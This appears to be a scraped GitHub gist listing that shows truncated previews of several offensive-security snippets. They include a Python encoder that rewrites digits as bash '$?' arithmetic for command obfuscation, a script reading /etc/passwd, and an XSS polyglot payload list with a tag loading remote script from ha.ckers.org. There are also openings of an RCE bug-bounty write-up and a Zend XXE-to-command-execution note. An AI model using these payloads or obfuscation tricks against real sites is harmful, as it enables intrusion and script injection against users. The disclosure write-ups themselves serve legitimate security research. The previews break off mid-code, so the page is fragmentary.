The write-up is basically the exploit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| m = { | |
| '0' : '$[$?/$$]', | |
| '1' : '$?', | |
| '2' : '$[$?+$?]', | |
| '3' : '$[$?+$?+$?]', | |
| '4' : '$[$?+$?+$?+$?]', | |
| '5' : '$[$?+$?+$?+$?+$?]', | |
| '6' : '$[($?+$?+$?)*($?+$?)]', |
zachriggle
/ README.md
Last active
June 15, 2016 02:51
cure53
/ wordpress.md
Last active
February 1, 2023 22:47
WordPress Flash XSS in flashmediaelement.swf
g33kyrash
/ username_checker.py
Created
April 22, 2016 13:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re, sys | |
| try: | |
| f = open("/etc/passwd",'r') | |
| except: | |
| print "\nCan't open the file!\n" | |
| sys.exit(0) | |
| #enter your username here | |
| username = "rash" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GitHub RCE by Environment variable injection Bug Bounty writeup | |
| Disclaimer: I'll keep this really short but I hope you'll get the key points. | |
| GitHub blogged a while ago about some internal tool called gerve: | |
| https://github.com/blog/530-how-we-made-github-fast | |
| Upon git+sshing to github.com gerve basically looks up your permission | |
| on the repo you want to interact with. Then it bounces you further in | |
| another forced SSH session to the back end where the repo actually is. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
| into a Remote Command Execution: | |
| NOTE: It relies on the PHP expect module being loaded | |
| (see http://de.php.net/manual/en/book.expect.php) | |
| joern@vbox-1:/tmp$ cat /var/www/server.php | |
| <? | |
| require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
| Zend_Loader_Autoloader::getInstance(); |